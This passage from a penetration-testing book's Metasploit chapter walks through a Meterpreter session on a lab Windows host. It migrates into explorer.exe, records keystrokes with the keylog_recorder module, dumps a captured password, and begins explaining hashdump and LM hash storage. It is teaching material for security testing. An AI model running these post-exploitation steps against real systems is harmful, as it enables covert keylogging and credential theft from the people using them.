82
Chapter 6
1476 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\
system32\spoolsv.exe
1668 explorer.exe x86 0 IHAZSECURITY\Administrator C:\WINDOWS\
Explorer.EXE
. . . SNIP . . .
4032 notepad.exe x86 0 IHAZSECURITY\Administrator C:\WINDOWS\
system32\notepad.exe
meterpreter >
migrate 1668
[*] Migrating to 1668...
[*] Migration completed successfully.
meterpreter >
run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/
20110324171334_default_192.168.1.195_host.windows.key_179703.txt
[*] Recording keystrokes...
[*] Saving last few keystrokes...
root@bt:~#
cat /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt
Keystroke log started at Thu Mar 24 17:13:34 -0600 2011
administrator password <Back> <Back> <Back> <Back> <Back> <Back> <Back> <Tab> password123!!
Executing
ps
at provides a list of running processes, including
explorer.exe
. At we issue the
migrate
command to move our session
into the
explorer.exe
process space. Once that move is complete, we start the
keylog_recorder
module at , stopping it after some time with
CTRL
-C, and
finally, at , in another terminal window, we dump the contents of the
keystroke logger to see what we’ve caught.
Dumping Usernames and Passwords
In the preceding example, we grabbed password hashes by logging what a
user typed. We can also use Meterpreter to obtain the usernames and pass-
word hashes on a local file system without the use of keyloggers.
Extracting the Password Hashes
In this attack, we’ll leverage the
hashdump
post exploitation module in Meter-
preter to extract the username and password hashes from the system. Microsoft
typically stores hashes on LAN Manager (LM), NT LAN Manager (NTLM),
and NT LAN Manager v2 (NTLMv2).
In the case of LM, for example, when a use enters a password for the first
time or changes a password, the password is assigned a hash value. Depend-
ing on the hash value length, the password can be split into seven-character
hashes. For example, if the password is
password123456
, the hash value could
be stored as
passwor
and
d123456
, so an attacker would simply need to crack